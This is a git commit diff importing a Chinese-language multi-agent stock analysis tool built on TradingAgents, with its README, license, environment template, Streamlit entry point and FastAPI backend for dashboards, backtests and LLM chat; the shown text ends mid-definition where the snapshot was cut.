commit 05bc60394c0a79b5ce42b19041bc154a382f2958 Author: wehub-resource-sync Date: Mon Jul 13 12:36:27 2026 +0800 chore: import upstream snapshot with attribution diff --git a/.DS_Store b/.DS_Store new file mode 100644 index 0000000..e96bd4e Binary files /dev/null and b/.DS_Store differ diff --git a/.env.example b/.env.example new file mode 100644 index 0000000..f84dddd --- /dev/null +++ b/.env.example @@ -0,0 +1,12 @@ +# LLM Providers (set the one you use) +OPENAI_API_KEY= +SILICONFLOW_API_KEY= +GOOGLE_API_KEY= +ANTHROPIC_API_KEY= +XAI_API_KEY= +OPENROUTER_API_KEY= + +# X Brief LLM (orchestrator,默认 SiliconFlow MiniMax-M2.5) +XBRIEF_ORCHESTRATOR_PROVIDER=siliconflow +XBRIEF_ORCHESTRATOR_MODEL=Pro/MiniMaxAI/MiniMax-M2.5 +XBRIEF_ORCHESTRATOR_BASE_URL=https://api.siliconflow.cn/v1 diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..8ea244f --- /dev/null +++ b/.gitignore @@ -0,0 +1,239 @@ +# Byte-compiled / optimized / DLL files +__pycache__/ +*.py[codz] +*$py.class + +# C extensions +*.so + +# Distribution / packaging +.Python +build/ +develop-eggs/ +dist/ +downloads/ +eggs/ +.eggs/ +lib/ +lib64/ +parts/ +sdist/ +var/ +wheels/ +share/python-wheels/ +*.egg-info/ +.installed.cfg +*.egg +MANIFEST + +# PyInstaller +# Usually these files are written by a python script from a template +# before PyInstaller builds the exe, so as to inject date/other infos into it. +*.manifest +*.spec + +# Installer logs +pip-log.txt +pip-delete-this-directory.txt + +# Unit test / coverage reports +htmlcov/ +.tox/ +.nox/ +.coverage +.coverage.* +.cache +nosetests.xml +coverage.xml +*.cover +*.py.cover +.hypothesis/ +.pytest_cache/ +cover/ + +# Translations +*.mo +*.pot + +# Django stuff: +*.log +local_settings.py +db.sqlite3 +db.sqlite3-journal + +# Flask stuff: +instance/ +.webassets-cache + +# Scrapy stuff: +.scrapy + +# Sphinx documentation +docs/_build/ + +# PyBuilder +.pybuilder/ +target/ + +# Jupyter Notebook +.ipynb_checkpoints + +# IPython +profile_default/ +ipython_config.py + +# pyenv +# For a library or package, you might want to ignore these files since the code is +# intended to run in multiple environments; otherwise, check them in: +# .python-version + +# pipenv +# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. +# However, in case of collaboration, if having platform-specific dependencies or dependencies +# having no cross-platform support, pipenv may install dependencies that don't work, or not +# install all needed dependencies. +# Pipfile.lock + +# UV +# Similar to Pipfile.lock, it is generally recommended to include uv.lock in version control. +# This is especially recommended for binary packages to ensure reproducibility, and is more +# commonly ignored for libraries. +# uv.lock + +# poetry +# Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control. +# This is especially recommended for binary packages to ensure reproducibility, and is more +# commonly ignored for libraries. +# https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control +# poetry.lock +# poetry.toml + +# pdm +# Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control. +# pdm recommends including project-wide configuration in pdm.toml, but excluding .pdm-python. +# https://pdm-project.org/en/latest/usage/project/#working-with-version-control +# pdm.lock +# pdm.toml +.pdm-python +.pdm-build/ + +# pixi +# Similar to Pipfile.lock, it is generally recommended to include pixi.lock in version control. +# pixi.lock +# Pixi creates a virtual environment in the .pixi directory, just like venv module creates one +# in the .venv directory. It is recommended not to include this directory in version control. +.pixi + +# PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm +__pypackages__/ + +# Celery stuff +celerybeat-schedule +celerybeat.pid + +# Redis +*.rdb +*.aof +*.pid + +# RabbitMQ +mnesia/ +rabbitmq/ +rabbitmq-data/ + +# ActiveMQ +activemq-data/ + +# SageMath parsed files +*.sage.py + +# Environments +.env +.envrc +.venv +env/ +venv/ +ENV/ +env.bak/ +venv.bak/ + +# Spyder project settings +.spyderproject +.spyproject + +# Rope project settings +.ropeproject + +# mkdocs documentation +/site + +# mypy +.mypy_cache/ +.dmypy.json +dmypy.json + +# Pyre type checker +.pyre/ + +# pytype static type analyzer +.pytype/ + +# Cython debug symbols +cython_debug/ + +# PyCharm +# JetBrains specific template is maintained in a separate JetBrains.gitignore that can +# be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore +# and can be added to the global gitignore or merged into this file. For a more nuclear +# option (not recommended) you can uncomment the following to ignore the entire idea folder. +# .idea/ + +# Abstra +# Abstra is an AI-powered process automation framework. +# Ignore directories containing user credentials, local state, and settings. +# Learn more at https://abstra.io/docs +.abstra/ + +# Visual Studio Code +# Visual Studio Code specific template is maintained in a separate VisualStudioCode.gitignore +# that can be found at https://github.com/github/gitignore/blob/main/Global/VisualStudioCode.gitignore +# and can be added to the global gitignore or merged into this file. However, if you prefer, +# you could uncomment the following to ignore the entire vscode folder +# .vscode/ + +# Ruff stuff: +.ruff_cache/ + +# PyPI configuration file +.pypirc + +# Marimo +marimo/_static/ +marimo/_lsp/ +__marimo__/ + +# Streamlit +.streamlit/secrets.toml + +# Cache +**/data_cache/ + +3月30日/* +images/* + +# Runtime outputs +eval_results/ +reports/ +results/ +# Runtime data +data/dashboard/history/ +data/dashboard/latest.json +data/cache/ +data/portfolio.json + +eval_results/* + +docs/data_report.md +docs/webui_prd.md +docs/strategy_module_future.md +docs/ui_shell.md \ No newline at end of file diff --git a/LICENSE b/LICENSE new file mode 100644 index 0000000..261eeb9 --- /dev/null +++ b/LICENSE @@ -0,0 +1,201 @@ + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + + Copyright [yyyy] [name of copyright owner] + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. diff --git a/README.md b/README.md new file mode 100644 index 0000000..7b2faaf --- /dev/null +++ b/README.md @@ -0,0 +1,160 @@ +# 个性化多智能体金融分析工具 + +## 基于TradingAgents底层框架打造 + +- 【2026-04】搭建Webui仪表盘作为观察大盘数据的入口,个股分析作为TradingAgents分析工具的入口 +- 【2026-04】后续预告:交易策略工具搭建中,包括回测,开仓信号,平仓信号等 + +基于 TradingAgents 多智能体框架,提供: + +- 交互式 CLI 分析流程 +- Streamlit WebUI(市场总览、个股分析、报告回看、持仓管理) +- 本地报告与快照持久化能力 + +> 仅用于研究与学习,不构成任何投资建议。 + +--- + +## 当前功能(WebUI) + +WebUI 入口:`app.py` + +一级页面(当前实现): + +1. **仪表盘** + - 指数、宏观代理、板块 Top3、Top10 新闻 + - LLM 新闻立场与摘要 + - LLM 大盘总结 + - 手动刷新并写入快照(latest + history) +2. **个股分析** + - 启动分析任务、查看运行进度与日志 + - 展示最新报告摘要 + - 内嵌历史报告浏览 +3. **策略** + - 当前为占位页(后续实现) +4. **股票筛选** + - 搜索/排序/查看 ticker + - 跳转股票详情页 +5. **股票详情** + - 概览指标、最新分析引导、历史报告 +6. **持仓** + - 本地持仓录入、同 ticker 合并、均价重算 + +产品规格文档见:`docs/webui_prd.md` + +--- + +## 项目结构(核心目录) + +```text +TradingAgents/ +├── app.py # WebUI 入口 +├── web/ +│ ├── pages/ # 各页面实现 +│ ├── services/ # 数据拉取/存储/LLM 服务 +│ ├── theme.py # 全局主题样式 +│ ├── sidebar_nav.py # 侧栏导航 +│ ├── history.py # 报告历史扫描 +│ └── report_viewer.py # 报告渲染 +├── tradingagents/ # 多智能体核心框架 +├── cli/ # CLI 入口与交互 +├── docs/ # 文档 +├── data/ # 本地运行数据(建议忽略运行产物) +├── reports/ # Web 分析报告输出(运行产物) +├── results/ # CLI 结果输出(运行产物) +└── eval_results/ # 评估日志输出(运行产物) +``` + +--- + +## 安装 + +```bash +git clone https://github.com/qchen34/TradingAgents.git +cd TradingAgents +python3 -m venv .venv +source .venv/bin/activate +pip install -r requirements.txt +``` + +--- + +## 环境变量 + +至少配置一个 LLM Provider 的 Key(按需): + +```bash +export OPENAI_API_KEY=... +export SILICONFLOW_API_KEY=... +export GOOGLE_API_KEY=... +export ANTHROPIC_API_KEY=... +export XAI_API_KEY=... +export OPENROUTER_API_KEY=... +export ALPHA_VANTAGE_API_KEY=... +``` + +也可使用 `.env`: + +```bash +cp .env.example .env +``` + +--- + +## 启动方式 + +### 1) 启动 WebUI + +```bash +streamlit run app.py +``` + +### 2) 启动 npm 前端 + Python API + +```bash +# API +python -m uvicorn backend.api.main:app --host 127.0.0.1 --port 8000 --reload + +# Frontend(新终端) +cd frontend +npm install +npm run dev +``` + +### 3) 一键并行启动(Streamlit + FastAPI + Next.js) + +```bash +bash scripts/start_dual_stack.sh +``` + +### 或 +### 4) 启动 CLI + +```bash +python -m cli.main +# 或(安装后) +tradingagents +``` + +--- + +## 运行数据与输出目录说明 + +以下目录/文件通常为运行自动生成,建议加入 `.gitignore`: + +- `eval_results/` +- `reports/` +- `results/` +- `data/dashboard/history/` +- `data/dashboard/latest.json` +- `data/cache/` +- `data/portfolio.json` + +如果你希望仓库“干净可复现”,建议只保留代码与文档,运行产物不入库。 + + + + +## 引用 + +本项目底层引用Tauric Research的TradingAgents框架:https://github.com/TauricResearch/TradingAgents \ No newline at end of file diff --git a/README.wehub.md b/README.wehub.md new file mode 100644 index 0000000..7524b96 --- /dev/null +++ b/README.wehub.md @@ -0,0 +1,7 @@ +# WeHub 来源说明 + +- 原始项目:`qchen34/TradingAgents` +- 原始仓库:https://github.com/qchen34/TradingAgents +- 导入方式:上游默认分支的最新快照 +- 原作者、版权和许可证信息以原始仓库及本仓库 LICENSE 为准 +- 本文件仅用于记录来源,不代表 WeHub 是原项目作者 diff --git a/app.py b/app.py new file mode 100644 index 0000000..27771a6 --- /dev/null +++ b/app.py @@ -0,0 +1,43 @@ +import streamlit as st + +from web.navigation import PAGE_DASHBOARD +from web.pages import PAGES +from web.sidebar_nav import render_sidebar_navigation +from web.theme import apply_theme + + +def _init_session_state() -> None: + defaults = { + "current_page": PAGE_DASHBOARD, + "ui_mode": "idle", + "show_config": False, + "event_log": [], + "runtime_stage": "", + "latest_run_dir": "", + "last_params": None, + "selected_params_summary": "", + "active_output_dir": "", + "runtime_stats": {}, + "selected_ticker": "QQQ", + "error": "", + } + for key, val in defaults.items(): + if key not in st.session_state: + st.session_state[key] = val + + +st.set_page_config(page_title="TradingAgents 控制台", layout="wide") +_init_session_state() +apply_theme() + +page_names = list(PAGES.keys()) +if st.session_state.current_page not in page_names: + st.session_state.current_page = page_names[0] + +with st.sidebar: + st.session_state.current_page = render_sidebar_navigation( + page_names, + st.session_state.current_page, + ) + +PAGES[st.session_state.current_page]() diff --git a/assets/TauricResearch.png b/assets/TauricResearch.png new file mode 100644 index 0000000..3e88994 Binary files /dev/null and b/assets/TauricResearch.png differ diff --git a/assets/analyst.png b/assets/analyst.png new file mode 100644 index 0000000..9c89a6e Binary files /dev/null and b/assets/analyst.png differ diff --git a/assets/cli/cli_init.png b/assets/cli/cli_init.png new file mode 100644 index 0000000..eeb2b63 Binary files /dev/null and b/assets/cli/cli_init.png differ diff --git a/assets/cli/cli_news.png b/assets/cli/cli_news.png new file mode 100644 index 0000000..b5d33be Binary files /dev/null and b/assets/cli/cli_news.png differ diff --git a/assets/cli/cli_technical.png b/assets/cli/cli_technical.png new file mode 100644 index 0000000..5fd363a Binary files /dev/null and b/assets/cli/cli_technical.png differ diff --git a/assets/cli/cli_transaction.png b/assets/cli/cli_transaction.png new file mode 100644 index 0000000..ab36d2b Binary files /dev/null and b/assets/cli/cli_transaction.png differ diff --git a/assets/researcher.png b/assets/researcher.png new file mode 100644 index 0000000..8301534 Binary files /dev/null and b/assets/researcher.png differ diff --git a/assets/risk.png b/assets/risk.png new file mode 100644 index 0000000..5708dc4 Binary files /dev/null and b/assets/risk.png differ diff --git a/assets/schema.png b/assets/schema.png new file mode 100644 index 0000000..549f8c5 Binary files /dev/null and b/assets/schema.png differ diff --git a/assets/trader.png b/assets/trader.png new file mode 100644 index 0000000..2bd7f51 Binary files /dev/null and b/assets/trader.png differ diff --git a/assets/wechat.png b/assets/wechat.png new file mode 100644 index 0000000..9435568 Binary files /dev/null and b/assets/wechat.png differ diff --git a/backend/__init__.py b/backend/__init__.py new file mode 100644 index 0000000..41c5f9e --- /dev/null +++ b/backend/__init__.py @@ -0,0 +1,2 @@ +"""Backend services for API and future workers.""" + diff --git a/backend/api/__init__.py b/backend/api/__init__.py new file mode 100644 index 0000000..86e7256 --- /dev/null +++ b/backend/api/__init__.py @@ -0,0 +1,2 @@ +"""FastAPI entry package for TradingAgents.""" + diff --git a/backend/api/main.py b/backend/api/main.py new file mode 100644 index 0000000..b2ef1d6 --- /dev/null +++ b/backend/api/main.py @@ -0,0 +1,183 @@ +from __future__ import annotations + +import uuid +from typing import Any + +from fastapi import FastAPI, Request +from fastapi.middleware.cors import CORSMiddleware +from fastapi.responses import JSONResponse + +from backend.api.schemas import ( + ApiEnvelope, + BatchQuoteRequest, + BacktestJobRequest, + DashboardRefreshRequest, + LrsChatRequest, + WheelEvaluateRequest, + XBriefRefreshRequest, +) +from backend.api.services import ( + DEFAULT_SESSION_STATE, + answer_lrs_chat, + batch_quotes, + create_backtest_job, + get_dashboard_snapshot, + get_backtest_job, + refresh_dashboard_snapshot, + refresh_x_brief, + strategy_metadata, + get_x_brief_latest, + wheel_evaluate, + wheel_profiles, +) +from web.services.backtesting_core import _PERIOD_ORDER, _PERIOD_SPECS + +app = FastAPI(title="TradingAgents API", version="0.1.0") + +app.add_middleware( + CORSMiddleware, + allow_origins=["*"], + allow_credentials=True, + allow_methods=["*"], + allow_headers=["*"], +) + + +def _trace_id(req: Request) -> str: + return req.headers.get("x-trace-id") or uuid.uuid4().hex + + +def _ok(request: Request, data: dict[str, Any] | list[Any] | None = None) -> JSONResponse: + payload = ApiEnvelope(success=True, data=data, trace_id=_trace_id(request)) + return JSONResponse(status_code=200, content=payload.model_dump()) + + +def _err(request: Request, msg: str, code: int = 500) -> JSONResponse: + payload = ApiEnvelope(success=False, error=msg, data=None, trace_id=_trace_id(request)) + return JSONResponse(status_code=code, content=payload.model_dump()) + + +@app.get("/health") +def health(request: Request) -> JSONResponse: + return _ok(request, {"status": "ok"}) + + +@app.get("/api/v1/state/defaults") +def state_defaults(request: Request) -> JSONResponse: + return _ok(request, DEFAULT_SESSION_STATE) + + +@app.get("/api/v1/strategy/metadata") +def get_strategy_metadata(request: Request) -> JSONResponse: + return _ok(request, strategy_metadata()) + + +@app.get("/api/v1/dashboard") +def get_dashboard(request: Request) -> JSONResponse: + try: + return _ok(request, get_dashboard_snapshot()) + except Exception as exc: + return _err(request, f"仪表盘数据读取失败:{exc}", 500) + + +@app.post("/api/v1/dashboard/refresh") +def post_dashboard_refresh(body: DashboardRefreshRequest, request: Request) -> JSONResponse: + try: + return _ok(request, refresh_dashboard_snapshot(limit=body.limit)) + except Exception as exc: + return _err(request, f"仪表盘刷新失败:{exc}", 500) + + +@app.post("/api/v1/quotes/batch") +def post_batch_quotes(body: BatchQuoteRequest, request: Request) -> JSONResponse: + try: + return _ok(request, batch_quotes(body.codes)) + except Exception as exc: + return _err(request, f"批量报价失败:{exc}", 500) + + +@app.get("/api/v1/x-brief/latest") +def get_xbrief_latest(request: Request) -> JSONResponse: + data = get_x_brief_latest() + if data is None: + return _ok(request, {"ready": False}) + return _ok(request, {"ready": True, **data}) + + +@app.post("/api/v1/x-brief/refresh") +def post_xbrief_refresh(body: XBriefRefreshRequest, request: Request) -> JSONResponse: + try: + data = refresh_x_brief(days=body.days, per_account_limit=body.per_account_limit) + return _ok(request, {"ready": True, **data}) + except Exception as exc: + return _err(request, f"X资讯简报刷新失败:{exc}", 500) + + +@app.post("/api/v1/strategy/lrs/chat") +def post_lrs_chat(body: LrsChatRequest, request: Request) -> JSONResponse: + try: + answer = answer_lrs_chat(body.question, body.last_params) + return _ok(request, {"answer": answer}) + except Exception as exc: + return _err(request, f"LLM 调用失败:{exc}", 500) + + +@app.get("/api/v1/wheel/profiles") +def get_wheel_profiles(request: Request) -> JSONResponse: + return _ok(request, wheel_profiles()) + + +@app.post("/api/v1/wheel/evaluate") +def post_wheel_evaluate(body: WheelEvaluateRequest, request: Request) -> JSONResponse: + try: + data = wheel_evaluate( + style_key=body.style_key, + underlying_ticker=body.underlying_ticker, + signal_ticker=body.signal_ticker, + ) + return _ok(request, data) + except Exception as exc: + return _err(request, f"Wheel 评估失败:{exc}", 500) + + +@app.get("/api/v1/backtest/periods") +def get_backtest_periods(request: Request) -> JSONResponse: + periods = [ + {"key": key, "label": _PERIOD_SPECS[key]["label"]} + for key in _PERIOD_ORDER + ] + return _ok(request, periods) + + +@app.post("/api/v1/backtest/jobs") +def post_backtest_job(body: BacktestJobRequest, request: Request) -> JSONResponse: + job = create_backtest_job(body.period_key) + return _ok( + request, + { + "job_id": job.job_id, + "status": job.status, + "period_key": job.period_key, + "created_at": job.created_at, + }, + ) + + +@app.get("/api/v1/backtest/jobs/{job_id}") +def get_job(job_id: str, request: Request) -> JSONResponse: + job = get_backtest_job(job_id) + if job is None: + return _err(request, "任务不存在", 404) + return _ok( + request, + { + "job_id": job.job_id, + "status": job.status, + "period_key": job.period_key, + "created_at": job.created_at, + "updated_at": job.updated_at, + "result": job.result, + "error": job.error, + }, + ) + diff --git a/backend/api/schemas.py b/backend/api/schemas.py new file mode 100644 index 0000000..3a520f0 --- /dev/null +++ b/backend/api/schemas.py @@ -0,0 +1,41 @@ +from __future__ import annotations + +from typing import Any, Literal + +from pydantic import BaseModel, Field + + +class ApiEnvelope(BaseModel): + success: bool = True + data: dict[str, Any] | list[Any] | None = None + error: str | None = None + trace_id: str + + +class LrsChatRequest(BaseModel): + question: str = Field(min_length=1) + last_params: dict[str, Any] | None = None + + +class BacktestJobRequest(BaseModel): + period_key: Literal["2y", "3y", "5y", "10y", "2015_2020", "2010_2015"] + + +class DashboardRefreshRequest(BaseModel): + limit: int = Field(default=10, ge=1, le=30) + + +class WheelEvaluateRequest(BaseModel): + style_key: Literal["aggressive", "neutral", "conservative"] = "neutral" + underlying_ticker: str = Field(default="TQQQ", min_length=1) + signal_ticker: str = Field(default="QQQ", min_length=1) + + +class BatchQuoteRequest(BaseModel): + codes: list[str] = Field(min_length=1, max_length=200) + + +class XBriefRefreshRequest(BaseModel): + days: int = Field(default=7, ge=3, le=30) + per_account_limit: int = Field(default=80, ge=10, le=200) + diff --git a/backend/api/services.py b/backend/api/services.py new file mode 100644 index 0000000..4a453d2 --- /dev/null +++ b/backend/api/services.py @@ -0,0 +1,400 @@ +from __future__ import annotations + +import os + +import threading +import uuid +from dataclasses import dataclass, field +from datetime import datetime, timezone +from typing import Any + +import numpy as np +import yfinance as yf + +from web.services import backtesting_core as bt +from web.services import market_data as md +from web.services.x_brief_data import collect_x_rss_last_week, normalize_to_x_url, save_raw_payload +from web.services.x_brief_llm import build_fallback_modules, build_x_brief_modules, translate_display_content +from web.services.x_brief_renderer import ( + build_monthly_analysis_markdown, + build_tweet_summary_markdown, + load_latest_view, + persist_outputs, +) +from web.pages.wheel.style_profiles import STYLE_PROFILES +from web.pages.wheel.strategy_shared import rsi +from web.services.dashboard_llm import build_llm_config +from web.services.strategy_api_service import answer_lrs_question, get_lrs_doc_markdown + + +DEFAULT_SESSION_STATE: dict[str, Any] = { + "current_page": "仪表盘", + "ui_mode": "idle", + "show_config": False, + "event_log": [], + "runtime_stage": "", + "latest_run_dir": "", + "last_params": None, + "selected_params_summary": "", + "active_output_dir": "", + "runtime_stats": {}, + "selected_ticker": "QQQ", + "error": "", + "strategy_sub_menu": "LRS TQQQ策略", +} + + +def strategy_metadata() -> dict[str, Any]: + return { + "sub_strategies": ["LRS TQQQ策略", "Wheel策略"], + "lrs_doc_md": get_lrs_doc_markdown(), + } + + +def answer_lrs_chat(question: str, last_params: dict[str, Any] | None) -> str: + cfg = build_llm_config(last_params) + prompt = ( + "你是量化策略研究助手。请围绕 LRS TQQQ 策略回答问题," + "要求中文、结构化、可执行。\n\n用户问题:" + f"{question}" + ) + return answer_lrs_question(prompt, cfg) + + +@dataclass +class BacktestJob: + job_id: str + period_key: str + status: str + created_at: str + result: dict[str, Any] | None = None + error: str | None = None + updated_at: str = field(default_factory=lambda: _now_iso()) + + +def _now_iso() -> str: + return datetime.now(timezone.utc).isoformat() + + +_JOBS: dict[str, BacktestJob] = {} +_LOCK = threading.Lock() + + +def _run_backtest(period_key: str, job_id: str) -> None: + try: + qqq_df, tqqq_df = bt._fetch(period_key) + if qqq_df.empty or tqqq_df.empty: + raise RuntimeError("QQQ 或 TQQQ 数据为空") + qqq_full = qqq_df["Close"].squeeze().dropna() + tqqq_full = tqqq_df["Close"].squeeze().dropna() + if len(qqq_full) < 220: + raise RuntimeError(f"数据量不足({len(qqq_full)} 天),无法计算 MA200") + trade_start = bt._get_effective_start(qqq_full, tqqq_full, period_key) + qqq_eff = qqq_full[trade_start:] + sig = bt._build_signals(qqq_full) + trades, equity = bt._simulate(sig, tqqq_full, trade_start=trade_start) + metrics = bt._metrics(trades, equity, qqq_eff) + with _LOCK: + _JOBS[job_id].status = "completed" + _JOBS[job_id].updated_at = _now_iso() + _JOBS[job_id].result = { + "period_key": period_key, + "period_label": bt._PERIOD_SPECS[period_key]["label"], + "date_range": { + "start": str(qqq_eff.index[0].date()), + "end": str(qqq_eff.index[-1].date()), + }, + "metrics": metrics, + "trades": [t.__dict__ for t in trades], + } + except Exception as exc: # pragma: no cover - best effort background task + with _LOCK: + _JOBS[job_id].status = "failed" + _JOBS[job_id].updated_at = _now_iso() + _JOBS[job_id].error = str(exc) + + +def create_backtest_job(period_key: str) -> BacktestJob: + job_id = uuid.uuid4().hex + job = BacktestJob( + job_id=job_id, + period_key=period_key, + status="running", + created_at=_now_iso(), + ) + with _LOCK: + _JOBS[job_id] = job + th = threading.Thread(target=_run_backtest, args=(period_key, job_id), daemon=True) + th.start() + return job + + +def get_backtest_job(job_id: str) -> BacktestJob | None: + with _LOCK: + return _JOBS.get(job_id) + + +def _serialize_quote_row(row: Any) -> dict[str, Any]: + return { + "ticker": getattr(row, "ticker", ""), + "label": getattr(row, "label", ""), + "price": getattr(row, "price", None), + "prev_close": getattr(row, "prev_close", None), + "change": getattr(row, "change", None), + "change_pct": getattr(row, "change_pct", None), + } + + +def _serialize_snapshot(snapshot: dict[str, Any], news: list[dict[str, Any]] | None) -> dict[str, Any]: + top6_raw = snapshot.get("top6_sectors") + if top6_raw is None: + top6_raw = snapshot.get("top3_sectors", []) + return { + "market_status": snapshot.get("market_status", "N/A"), + "last_updated_et": snapshot.get("last_updated_et", "N/A"), + "fetched_at_utc": snapshot.get("fetched_at_utc", ""), + "llm_model": snapshot.get("llm_model", ""), + "llm_provider": snapshot.get("llm_provider", ""), + "llm_news_error": snapshot.get("llm_news_error", ""), + "llm_digest_error": snapshot.get("llm_digest_error", ""), + "market_digest_md": snapshot.get("market_digest_md", ""), + "indexes": [_serialize_quote_row(x) for x in snapshot.get("indexes", [])], + "top6_sectors": [_serialize_quote_row(x) for x in top6_raw], + "macro_strip": snapshot.get("macro_strip") or [], + "news": news or [], + } + + +def get_dashboard_snapshot() -> dict[str, Any]: + snapshot, news = md.load_dashboard_display() + if snapshot is None: + snapshot = md.get_dashboard_market_snapshot() + return _serialize_snapshot(snapshot, news) + + +def 